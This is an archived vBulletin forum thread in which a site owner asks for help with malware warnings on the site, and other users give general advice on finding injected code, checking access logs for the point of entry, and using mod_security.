Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
Reload this Page Malware Issue - Urgent Help
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 11-11-2010, 03:00 PM
Cutsizzle Cutsizzle is offline
 
Join Date: Apr 2010
Posts: 39
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Malware Issue - Urgent Help
I am having users say they are getting a malware warning when going to my site.

Can somebody find the root of the problem please?

www.chicitysports.com
www.chicitysports.com/forum

Thank you to whoever can help!
Reply With Quote
  #2  
Old 11-11-2010, 05:20 PM
Lynne's Avatar
Lynne Lynne is offline
 
Join Date: Sep 2004
Location: California/Idaho
Posts: 41,180
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
What happened when Google visited this site?
Of the 29 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-11-10, and the last time suspicious content was found on this site was on 2010-11-10.This site was hosted on 1 network(s) including AS32475 (SINGLEHOP).
Your site has no CSS. Looking in the page source, it calls this:
http://www.chicitysports.com/wp-content/plugins/digg-digg/include/../css/diggdigg-style.css?ver=4.5.0.2

So, you've got some issues. I'd suggest using a totally default style and turning off your mods and seeing if that fixes the issue.
Reply With Quote
  #3  
Old 11-22-2010, 06:49 PM
CarlitoBrigante's Avatar
CarlitoBrigante CarlitoBrigante is offline
 
Join Date: Nov 2002
Location: Iceland
Posts: 182
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
In these cases, the problem is NEVER, NEVER, NEVER cleaning up the infection. Usually the infection is either in a template or a plugin, hidden using some basic encoding like base64 to make it more difficult to be detected. Easy to clean.

The true problem is finding out HOW you were infected. This can take hours of going through your logs, and in some cases where logs are rotated very often or where you have a lot of traffic, it can take days of research to figure out what happened. In the past, investigating hack attempts, I even found security holes in scripts that most people considered perfectly safe. To do the same, you need to do some search across your access_log (and error_log) and aim at finding possible weird or unusual vBulletin calls. Try googling for access_log analysis and you might find some tips on how to get started.

In many cases, in my experience, the point of entry is simply a shared server environment, especially if the host is of dubious reputation. In these cases, the system is not setup to use the proper security policy and users are able to gain access to your database, for example, or to world writable directories in your website.

Regardless of their point of entry, these hackers (or script kids) then inject some code - often PHP scripts - into directories or vBulletin plugins, and then run the code to install whatever they want in your templates.

This can be used to spy on your users passwords, or sometimes just to show ad popups that link back to the hackers' accounts (in this case, it is easy to figure out who the attacker his and contact your local authorities, if the infraction is serious or caused major service disruption).

Lynne gave you good tips, BUT if the code has been injected into your plugins, or if the security hole allowing people to enter is in some modification and nobody has yet noticed or reported it, her tips will not be enough to get rid of the infection. Of course, if you do not have a fully upgraded setup - vBulletin and ALL modifications - then you might be running code with already known security holes.

--------------- Added [DATE]1290464426[/DATE] at [TIME]1290464426[/TIME] ---------------

On a note, after the always needed software upgrades, mod_security is by FAR the best tool to prevent these hacks even if you have vulnerable software installed. Some providers even create custom rules that are updated as soon as an exploit in a popular software (or one that you report) is found out, and your mod_security is automatically updated.

This might sound like advertising, but I have no affiliation with them - the guys at AtomiCorp.com offer a package which includes mod_security rules customized and updated as soon as a new exploit is found out in software like Wordpress or vBulletin. The only problem I had with their packages is that if you have an admincp located in a custom directory (which is often recommended), you might see some slowdown in the admincp area, caused by the fact that their mod_security rules are optimized only for standard vBulletin installs. And I think their stuff is optimized for Plesk, not sure if it would work on cPanel.
Reply With Quote
Reply

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 06:08 AM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04243 seconds
  • Memory Usage 2,180KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (3)post_thanks_box
  • (3)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (3)post_thanks_postbit_info
  • (3)postbit
  • (3)postbit_onlinestatus
  • (3)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete